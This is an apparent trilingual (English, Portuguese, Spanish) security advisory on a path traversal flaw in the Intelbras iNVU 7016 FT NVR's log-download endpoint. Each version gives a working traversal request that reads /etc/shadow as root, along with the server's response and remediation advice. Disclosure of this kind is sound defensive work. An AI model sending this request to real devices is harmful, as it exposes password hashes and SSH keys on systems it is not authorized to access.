summary

Path Traversal vulnerability leading to Local File Inclusion in the execution log download endpoint of the Intelbras iNVU 7016 FT, a 16-channel NVR (Network Video Recorder) with AI capabilities. The flaw allows arbitrary file read with root privileges.

CVE pending.

affected product

• Vendor: Intelbras
• Product: iNVU 7016 FT
• Firmware: 3.004.00IB000.0.T (Build 2025-09-26)
• Web Interface: 5.031.0.250926.1539217.AI.M.V2
• Kernel: Linux 5.15.73 (aarch64)
• CWE: CWE-22 — Improper Limitation of a Pathname to a Restricted Directory
• CVSS v3.1: 7.7 (High) — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

background

the iNVU 7016 FT is a professional-grade NVR with 16 channels and built-in AI features like facial recognition, license plate recognition (LPR), and PPE detection. widely deployed in corporate environments. runs embedded Linux on aarch64.

the firmware versioning suffix "IB" and the use of the JSON-RPC interface at /RPC2 indicate this product is based on the Dahua codebase. this is relevant because the same vulnerability likely affects other OEM devices sharing this codebase.

discovery

found during an authorized security assessment in a controlled environment. the affected functionality is the execution log file download, accessible under "Advanced Maintenance > Execution Logs" in the admin panel.

the page lists log files and allows downloading them. intercepting the request with Burp Suite revealed the file path is passed directly in the URL with no proper validation.

technical details

legitimate request to download a log file:

GET /RPC2_Loadfile/syslog/<device_model>_<serial_number>@syslog HTTP/1.1
Host: <target>
Cookie: WebClientHttpSessionID=<valid_session>

by injecting directory traversal sequences into the path:

GET /RPC2_Loadfile/syslog/../../../../etc/shadow HTTP/1.1
Host: <target>
Cookie: WebClientHttpSessionID=<valid_session>

the server responds with HTTP 200 and the file contents:

HTTP/1.1 200 OK
X-XSS-Protection: 1;mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
Strict-Transport-Security: max-age=604800; includeSubDomains
Content-type: application/http

root:x:0:0:root:/root:/bin/dsh
[...]
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:0:502:Linux User,,,:/:/bin/dsh

the response confirms arbitrary file read. the /bin/dsh shell and the user structure are consistent with Dahua-based embedded Linux firmware. the same technique was validated against /etc/shadow, /etc/ssh/ssh_host_dsa_key, and other sensitive files.

impact

the web application runs as root, confirmed by the successful read of /etc/shadow (which requires elevated privileges). this significantly amplifies the impact:

• read password hashes (/etc/shadow)
• read SSH private keys (/etc/ssh/ssh_host_dsa_key)
• read configuration files with hardcoded credentials
• potential escalation to Remote Code Execution depending on other vectors

exploitation prerequisites

exploitation requires:

• valid authentication on the web interface
• user belonging to a group with one of the following permissions: "Storage", "Maintenance", or "System"

worth noting: these permissions are not exclusive to the global admin. a user with just "Storage" permission, for example, can also exploit this vulnerability.

remediation

• implement a whitelist of allowed directories for file download
• normalize paths (canonical path) and validate the resolved file is inside the allowed directory
• sanitize input by blocking path traversal patterns (../, alternate encodings)
• apply least privilege: the web application should not run as root
• review user group permissions and restrict sensitive capabilities

references

• CWE-22: Improper Limitation of a Pathname to a Restricted Directory
• OWASP — Path Traversal
• VulDB submission: [LINK_VULDB]

resumo

vulnerabilidade de Path Traversal levando a Local File Inclusion no endpoint de download de logs de execução do Intelbras iNVU 7016 FT, um NVR (Network Video Recorder) de 16 canais com recursos de IA. a falha permite leitura arbitrária de arquivos do sistema com privilégios de root.

CVE pendente.

produto afetado

• Fabricante: Intelbras
• Produto: iNVU 7016 FT
• Firmware: 3.004.00IB000.0.T (Build 2025-09-26)
• Interface Web: 5.031.0.250926.1539217.AI.M.V2
• Kernel: Linux 5.15.73 (aarch64)
• CWE: CWE-22 — Improper Limitation of a Pathname to a Restricted Directory
• CVSS v3.1: 7.7 (High) — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

contexto

o iNVU 7016 FT é um NVR profissional com 16 canais e recursos de IA embarcados: reconhecimento facial, leitura de placas (LPR) e detecção de EPI. bastante usado em projetos corporativos. roda Linux embarcado em aarch64.

o sufixo "IB" no versionamento do firmware e o uso da interface JSON-RPC em /RPC2 indicam que o produto é baseado na codebase Dahua. isso é relevante porque a mesma vulnerabilidade provavelmente afeta outros dispositivos OEM que compartilham essa base de código.

descoberta

identificada durante uma avaliação de segurança autorizada em ambiente controlado. a funcionalidade afetada é o download de arquivos de log de execução, acessível em "Manutenção avançada > Registros de execução" no painel administrativo.

a página lista arquivos de log e permite download. ao interceptar a requisição com Burp Suite, o caminho do arquivo era passado direto na URL sem validação adequada.

detalhes técnicos

requisição legítima pra baixar um log:

GET /RPC2_Loadfile/syslog/<device_model>_<serial_number>@syslog HTTP/1.1
Host: <target>
Cookie: WebClientHttpSessionID=<valid_session>

injetando sequências de directory traversal no path:

GET /RPC2_Loadfile/syslog/../../../../etc/shadow HTTP/1.1
Host: <target>
Cookie: WebClientHttpSessionID=<valid_session>

o servidor responde com HTTP 200 e o conteudo do arquivo:

HTTP/1.1 200 OK
X-XSS-Protection: 1;mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
Strict-Transport-Security: max-age=604800; includeSubDomains
Content-type: application/http

root:x:0:0:root:/root:/bin/dsh
[...]
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:0:502:Linux User,,,:/:/bin/dsh

a resposta confirma leitura arbitraria de arquivos. o shell /bin/dsh e a estrutura de usuarios sao consistentes com firmware Linux embarcado baseado em Dahua. a mesma tecnica foi validada contra /etc/shadow, /etc/ssh/ssh_host_dsa_key, e outros arquivos sensiveis.

impacto

a aplicação web roda como root, validado pela leitura bem-sucedida de /etc/shadow (que exige privilégios elevados). isso amplia significativamente o impacto:

• leitura de hashes de senha (/etc/shadow)
• leitura de chaves privadas SSH (/etc/ssh/ssh_host_dsa_key)
• leitura de arquivos de configuração com credenciais hardcoded
• potencial escalação pra Remote Code Execution dependendo de outros vetores

pré-requisitos de exploração

a exploração requer:

• autenticação válida na interface web
• usuário pertencente a grupo com uma das permissões: "Armazenamento", "Manutenção" ou "Sistema"

importante: essas permissões não são exclusivas do admin global. um usuário com permissão pontual de "Armazenamento", por exemplo, também consegue explorar.

remediação

• implementar whitelist de diretórios permitidos pro download
• normalizar caminhos (canonical path) e validar se o arquivo resolvido está dentro do diretório autorizado
• sanitizar input bloqueando padrões de path traversal (../, codificações alternativas)
• aplicar princípio do menor privilégio: a aplicação web não deveria rodar como root
• revisar permissões dos grupos de usuários e restringir capacidades sensíveis

referências

• CWE-22: Improper Limitation of a Pathname to a Restricted Directory
• OWASP — Path Traversal
• VulDB submission: [LINK_VULDB]

resumen

vulnerabilidad de Path Traversal que lleva a Local File Inclusion en el endpoint de descarga de logs de ejecución del Intelbras iNVU 7016 FT, un NVR (Network Video Recorder) de 16 canales con capacidades de IA. la falla permite lectura arbitraria de archivos del sistema con privilegios de root.

CVE pendiente.

producto afectado

• Fabricante: Intelbras
• Producto: iNVU 7016 FT
• Firmware: 3.004.00IB000.0.T (Build 2025-09-26)
• Interfaz Web: 5.031.0.250926.1539217.AI.M.V2
• Kernel: Linux 5.15.73 (aarch64)
• CWE: CWE-22 — Improper Limitation of a Pathname to a Restricted Directory
• CVSS v3.1: 7.7 (High) — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

contexto

el iNVU 7016 FT es un NVR profesional con 16 canales y funciones de IA integradas: reconocimiento facial, lectura de patentes (LPR) y detección de EPP. bastante usado en proyectos corporativos. corre Linux embebido en aarch64.

el sufijo "IB" en el versionado del firmware y el uso de la interfaz JSON-RPC en /RPC2 indican que el producto está basado en el codebase de Dahua. esto es relevante porque la misma vulnerabilidad probablemente afecta a otros dispositivos OEM que comparten esta base de código.

descubrimiento

identificada durante una evaluación de seguridad autorizada en un ambiente controlado. la funcionalidad afectada es la descarga de archivos de log de ejecución, accesible en "Mantenimiento avanzado > Registros de ejecución" en el panel administrativo.

la página lista archivos de log y permite descargarlos. al interceptar la solicitud con Burp Suite, la ruta del archivo se pasaba directo en la URL sin validación adecuada.

detalles técnicos

solicitud legítima para descargar un log:

GET /RPC2_Loadfile/syslog/<device_model>_<serial_number>@syslog HTTP/1.1
Host: <target>
Cookie: WebClientHttpSessionID=<valid_session>

inyectando secuencias de directory traversal en el path:

GET /RPC2_Loadfile/syslog/../../../../etc/shadow HTTP/1.1
Host: <target>
Cookie: WebClientHttpSessionID=<valid_session>

el servidor responde con HTTP 200 y el contenido del archivo:

HTTP/1.1 200 OK
X-XSS-Protection: 1;mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
Strict-Transport-Security: max-age=604800; includeSubDomains
Content-type: application/http

root:x:0:0:root:/root:/bin/dsh
[...]
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:0:502:Linux User,,,:/:/bin/dsh

la respuesta confirma lectura arbitraria de archivos. el shell /bin/dsh y la estructura de usuarios son consistentes con firmware Linux embebido basado en Dahua. la misma tecnica fue validada contra /etc/shadow, /etc/ssh/ssh_host_dsa_key, y otros archivos sensibles.

impacto

la aplicación web corre como root, validado por la lectura exitosa de /etc/shadow (que requiere privilegios elevados). esto amplifica significativamente el impacto:

• lectura de hashes de contraseña (/etc/shadow)
• lectura de claves privadas SSH (/etc/ssh/ssh_host_dsa_key)
• lectura de archivos de configuración con credenciales hardcoded
• potencial escalación a Remote Code Execution dependiendo de otros vectores

prerequisitos de explotación

la explotación requiere:

• autenticación válida en la interfaz web
• usuario perteneciente a un grupo con uno de los siguientes permisos: "Almacenamiento", "Mantenimiento" o "Sistema"

importante: estos permisos no son exclusivos del admin global. un usuario con solo el permiso de "Almacenamiento", por ejemplo, también puede explotar esta vulnerabilidad.

remediación

• implementar whitelist de directorios permitidos para la descarga
• normalizar rutas (canonical path) y validar que el archivo resuelto esté dentro del directorio autorizado
• sanitizar input bloqueando patrones de path traversal (../, codificaciones alternativas)
• aplicar principio de menor privilegio: la aplicación web no debería correr como root
• revisar permisos de los grupos de usuarios y restringir capacidades sensibles

referencias

• CWE-22: Improper Limitation of a Pathname to a Restricted Directory
• OWASP — Path Traversal
• VulDB submission: [LINK_VULDB]